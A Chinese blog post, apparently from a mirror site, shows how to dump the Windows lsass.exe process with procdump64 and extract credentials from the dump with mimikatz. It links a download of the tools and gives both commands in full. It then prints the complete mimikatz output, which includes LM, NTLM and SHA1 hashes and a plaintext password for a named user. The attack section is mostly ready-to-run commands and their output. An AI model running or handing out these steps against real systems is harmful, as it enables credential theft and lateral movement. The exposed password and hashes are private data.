zoukankan      html  css  js  c++  java
  • 两步完成利用procdump64+mimikatz获取win用户密码

    使用procdump64+mimikatz可实现从内存中获取明文密码

    工具

    1
    链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38

    首先得先获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到, 比如这样

    1.导出lsass.exe

    1
    procdump64.exe -accepteula -ma lsass.exe lsass.dmp

     (注:必须使用管理员权限)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    ProcDump v8.0 - Writes process dump files
    Copyright (C) 2009-2016 Mark Russinovich
    Sysinternals - www.sysinternals.com
    With contributions from Andrew Richards
     
    [15:33:26] Dump 1 initiated: C:UserschengleeDesktopProcdumplsass.dmp
    [15:33:28] Dump 1 writing: Estimated dump file size is 34 MB.
    [15:33:28] Dump 1 complete: 34 MB written in 1.4 seconds
    [15:33:28] Dump count reached.

    2.执行mimikatz

    1
    mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

    (注:必须使用管理员权限)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    ECHO 处于打开状态。
     
      .#####.   mimikatz 2.1.1 (x64) built on Jun 16 2018 18:49:05 - lil!
     .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
     ## / ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
     ## / ##       > http://blog.gentilkiwi.com/mimikatz
     '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
      '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/
     
    mimikatz(commandline) # sekurlsa::minidump lsass.dmp
    Switch to MINIDUMP : 'lsass.dmp'
     
    mimikatz(commandline) # sekurlsa::logonPasswords full
    Opening : 'lsass.dmp' file for minidump...
     
    Authentication Id : 0 ; 137859 (00000000:00021a83)
    Session           : Interactive from 1
    User Name         : chenglee
    Domain            : chenglee-PC
    Logon Server      : CHENGLEE-PC
    Logon Time        : 2018/7/25 15:06:35
    SID               : S-1-5-21-452281122-3045282507-3243563612-1000
        msv :  
         [00000003] Primary
         * Username : chenglee
         * Domain   : chenglee-PC
         * LM       : 9cffd5e7eefa14babacbf0b4adf55fde
         * NTLM     : 8d0f8e1a18236379538411a9056799f5
         * SHA1     : 989281f47698b73e026160e842d86bc64c9e3c20
        tspkg :
         * Username : chenglee
         * Domain   : chenglee-PC
         * Password : lizhenghua
        wdigest :  
         * Username : chenglee
         * Domain   : chenglee-PC
         * Password : lizhenghua
        kerberos : 
         * Username : chenglee
         * Domain   : chenglee-PC
         * Password : lizhenghua
        ssp :  
        credman :  
     
    Authentication Id : 0 ; 137821 (00000000:00021a5d)
    Session           : Interactive from 1
    User Name         : chenglee
    Domain            : chenglee-PC
    Logon Server      : CHENGLEE-PC
    Logon Time        : 2018/7/25 15:06:35
    SID               : S-1-5-21-452281122-3045282507-3243563612-1000
        msv :  
         [00000003] Primary
         * Username : chenglee
         * Domain   : chenglee-PC
         * LM       : 9cffd5e7eefa14babacbf0b4adf55fde
         * NTLM     : 8d0f8e1a18236379538411a9056799f5
         * SHA1     : 989281f47698b73e026160e842d86bc64c9e3c20
        tspkg :
         * Username : chenglee
         * Domain   : chenglee-PC
         * Password : lizhenghua
        wdigest :  
         * Username : chenglee
         * Domain   : chenglee-PC
         * Password : lizhenghua
        kerberos : 
         * Username : chenglee
         * Domain   : chenglee-PC
         * Password : lizhenghua
        ssp :  
        credman :  
     
    Authentication Id : 0 ; 997 (00000000:000003e5)
    Session           : Service from 0
    User Name         : LOCAL SERVICE
    Domain            : NT AUTHORITY
    Logon Server      : (null)
    Logon Time        : 2018/7/25 15:06:15
    SID               : S-1-5-19
        msv :  
        tspkg :
        wdigest :  
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos : 
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :  
        credman :  
     
    Authentication Id : 0 ; 996 (00000000:000003e4)
    Session           : Service from 0
    User Name         : CHENGLEE-PC$
    Domain            : WORKGROUP
    Logon Server      : (null)
    Logon Time        : 2018/7/25 15:06:15
    SID               : S-1-5-20
        msv :  
        tspkg :
        wdigest :  
         * Username : CHENGLEE-PC$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos : 
         * Username : chenglee-pc$
         * Domain   : WORKGROUP
         * Password : (null)
        ssp :  
        credman :  
     
    Authentication Id : 0 ; 48630 (00000000:0000bdf6)
    Session           : UndefinedLogonType from 0
    User Name         : (null)
    Domain            : (null)
    Logon Server      : (null)
    Logon Time        : 2018/7/25 15:06:06
    SID               :
        msv :  
        tspkg :
        wdigest :  
        kerberos : 
        ssp :  
        credman :  
     
    Authentication Id : 0 ; 999 (00000000:000003e7)
    Session           : UndefinedLogonType from 0
    User Name         : CHENGLEE-PC$
    Domain            : WORKGROUP
    Logon Server      : (null)
    Logon Time        : 2018/7/25 15:06:05
    SID               : S-1-5-18
        msv :  
        tspkg :
        wdigest :  
         * Username : CHENGLEE-PC$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos : 
         * Username : chenglee-pc$
         * Domain   : WORKGROUP
         * Password : (null)
        ssp :  
        credman :  
     
    mimikatz(commandline) # exit
    Bye!

     看, 密码[lizhenghua]处于明文暴露状态.

    如果不是使用管理员模式运行cmd会报错,

     
  • 相关阅读:
    C# BackGroundWorker控件演示代码
    C#多线程池演示例程下载图片
    反流技术之IE插件技术研究第二部分
    C# 从剪贴板中读取HTML中的中文字符出现乱码问题的解决方案
    C#单线程演示程序带参数
    C# 中as和is的用法总结
    Delphi关于记录文件的操作
    用PowerDesigner创建Access数据库
    常用Delphi开发资料网址
    等待外部应用程序的执行结果
  • 原文地址:https://www.cnblogs.com/ssw6/p/14929701.html
Copyright © 2011-2022 走看看